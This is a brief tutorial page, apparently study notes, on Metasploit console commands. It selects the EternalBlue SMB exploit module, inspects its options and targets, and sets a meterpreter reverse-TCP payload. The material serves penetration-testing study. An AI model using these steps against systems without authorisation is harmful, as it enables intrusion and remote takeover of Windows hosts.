Skip to main content

module_command

help module

Let's use the eternalblue module:

search type:exploit eternal
use exploit/windows/smb/ms17_010_eternalblue

Now we can show info on the current exploit with:

show info # or info

We can show available options of the current selected module with:

show options # or options

We can also show advanced options with:

show advanced # or advanced

the most changed option in the advanced options is the "TARGET" variable. This variable could completely change our game, and the available payloads.

Indeed for example, for a tomcat webserver, the default target is a JVM, anyway if we exploit it with default settings, we will end up with the same privileges of the webserver account and also a limited set of payloads available before exploitation. In fact we can change target according to the operating system information we have in order to have more targeted payloads and the change of being root/Administrator.

We can save a module in our stack to return to it with the previous command by doing pushm when inside an active module.

We can also pop momdules from the stack with the popm command.

Inside an active module we can inspect the code or edit it by issuing:

edit

When we are inside a specific module, we can check which are the available payloads (actions to do once we take advantage of the exploit code) with the following command:

show payloads

Once we detect a payload we are interested in (generally if possible, meterpreter payloads which makes our life easier and reverse tcp shell), we can type:

set payload wndows/x64/meterpreter/reverse_tcp

Now we can configure the options of the payload if we type:

show options # or options

We will see additional options provided by the payload.